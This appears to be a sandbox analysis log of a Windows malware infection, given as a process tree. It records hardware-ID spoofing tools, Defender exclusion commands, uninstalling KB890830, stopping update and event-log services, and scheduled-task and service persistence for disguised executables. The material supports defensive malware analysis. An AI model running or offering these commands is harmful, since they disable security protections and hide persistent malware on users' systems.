                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                                                  4⤵
                                                                    PID:4516
                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 67268HP-TRGT24169FU
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:1452
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                                                    4⤵
                                                                      PID:4892
                                                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 37268HP-TRGT24169DQ
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:752
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                                      4⤵
                                                                        PID:3876
                                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 77268HP-TRGT24169MST
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:3164
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                        4⤵
                                                                          PID:4684
                                                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:3000
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: D8BC-1NG5
                                                                          4⤵
                                                                            PID:3336
                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: D8BC-1NG5
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:796
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: A6K4-OBTV
                                                                            4⤵
                                                                              PID:4884
                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: A6K4-OBTV
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:4652
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: U6A0-RVS4
                                                                              4⤵
                                                                                PID:3344
                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: U6A0-RVS4
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2080
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 3R7I-EKOK
                                                                                4⤵
                                                                                  PID:2116
                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 3R7I-EKOK
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2620
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: NPDL-P84P
                                                                                  4⤵
                                                                                    PID:656
                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: NPDL-P84P
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4916
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: M1KB-DPRA
                                                                                    4⤵
                                                                                      PID:3260
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        5⤵
                                                                                          PID:2336
                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: M1KB-DPRA
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4732
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 56L6-OOSD
                                                                                        4⤵
                                                                                          PID:1876
                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 56L6-OOSD
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2616
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: B272-ECO4
                                                                                          4⤵
                                                                                            PID:380
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:1364
                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: B272-ECO4
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2828
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IKRL-HTS4
                                                                                              4⤵
                                                                                                PID:3664
                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IKRL-HTS4
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4132
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: C7VC-MME1
                                                                                                4⤵
                                                                                                  PID:1868
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    5⤵
                                                                                                      PID:988
                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: C7VC-MME1
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4500
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: ASZ5-MMAD
                                                                                                    4⤵
                                                                                                      PID:4708
                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: ASZ5-MMAD
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2260
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: SGFC-U0Z8
                                                                                                      4⤵
                                                                                                        PID:828
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          5⤵
                                                                                                            PID:4736
                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: SGFC-U0Z8
                                                                                                            5⤵
                                                                                                              PID:2200
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 1BD6-LGOO
                                                                                                            4⤵
                                                                                                              PID:2384
                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 1BD6-LGOO
                                                                                                                5⤵
                                                                                                                  PID:2640
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: 6VPK-JSVC
                                                                                                                4⤵
                                                                                                                  PID:3164
                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: 6VPK-JSVC
                                                                                                                    5⤵
                                                                                                                      PID:3324
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5A9I-KKHT
                                                                                                                    4⤵
                                                                                                                      PID:4812
                                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5A9I-KKHT
                                                                                                                        5⤵
                                                                                                                          PID:2772
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: UN4T-3OMR
                                                                                                                        4⤵
                                                                                                                          PID:3240
                                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: UN4T-3OMR
                                                                                                                            5⤵
                                                                                                                              PID:1316
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: CSR6-DI3R
                                                                                                                            4⤵
                                                                                                                              PID:1676
                                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: CSR6-DI3R
                                                                                                                                5⤵
                                                                                                                                  PID:4340
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: K3GE-POUK
                                                                                                                                4⤵
                                                                                                                                  PID:2380
                                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: K3GE-POUK
                                                                                                                                    5⤵
                                                                                                                                      PID:872
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 95E0-6PH9
                                                                                                                                    4⤵
                                                                                                                                      PID:1404
                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 95E0-6PH9
                                                                                                                                        5⤵
                                                                                                                                          PID:3648
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 8LCL-VN6V
                                                                                                                                        4⤵
                                                                                                                                          PID:3988
                                                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 8LCL-VN6V
                                                                                                                                            5⤵
                                                                                                                                              PID:1804
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 5UAC-T3HG
                                                                                                                                            4⤵
                                                                                                                                              PID:1916
                                                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 5UAC-T3HG
                                                                                                                                                5⤵
                                                                                                                                                  PID:4652
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: KKSA-BO27
                                                                                                                                                4⤵
                                                                                                                                                  PID:1896
                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: KKSA-BO27
                                                                                                                                                    5⤵
                                                                                                                                                      PID:3472
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 7DO6-5NRC
                                                                                                                                                    4⤵
                                                                                                                                                      PID:648
                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 7DO6-5NRC
                                                                                                                                                        5⤵
                                                                                                                                                          PID:1988
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4712
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1108
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2284
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4640
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4776
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4228
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4660
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:3188
                                                                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:4696
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
                                                                                                                                                                        5⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:896
                                                                                                                                                                        • C:\ChainReview\sphyperRuntimedhcpSvc.exe
                                                                                                                                                                          "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:2644
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Web\Screen\dllhost.exe'
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:2700
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\services.exe'
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:3680
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\services.exe'
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:4680
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\conhostsft.exe'
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:316
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\uk-UA\DevManView.exe'
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:3192
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\G90DozWxqW.bat"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:1996
                                                                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                                                                chcp 65001
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:2552
                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                  ping -n 10 localhost
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                  PID:2336
                                                                                                                                                                                • C:\Windows\Web\Screen\dllhost.exe
                                                                                                                                                                                  "C:\Windows\Web\Screen\dllhost.exe"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:3540
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\conhostsft.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                        PID:4916
                                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:3164
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:396
                                                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:3344
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:3648
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:748
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:4148
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:372
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:4936
                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Power Settings
                                                                                                                                                                              PID:3708
                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Power Settings
                                                                                                                                                                              PID:3192
                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Power Settings
                                                                                                                                                                              PID:4244
                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Power Settings
                                                                                                                                                                              PID:3180
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe delete "driverupdate"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:1360
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2236
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2328
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe start "driverupdate"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:752
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:4140
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                              PID:872
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                5⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                PID:3664
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\dllhost.exe'" /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:4620
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Web\Screen\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:2560
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:4812
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\services.exe'" /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:4396
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\services.exe'" /rl HIGHEST /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:1964
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\services.exe'" /rl HIGHEST /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:1916
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\ChainReview\services.exe'" /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:812
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\ChainReview\services.exe'" /rl HIGHEST /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:4148
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\ChainReview\services.exe'" /rl HIGHEST /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:1372
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "conhostsftc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Saved Games\conhostsft.exe'" /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:3792
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "conhostsft" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\conhostsft.exe'" /rl HIGHEST /f
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:3336
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks.exe /create /tn "conhostsftc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Saved Games\conhostsft.exe'" /rl HIGHEST /f
                                                                                                                                                                        1⤵
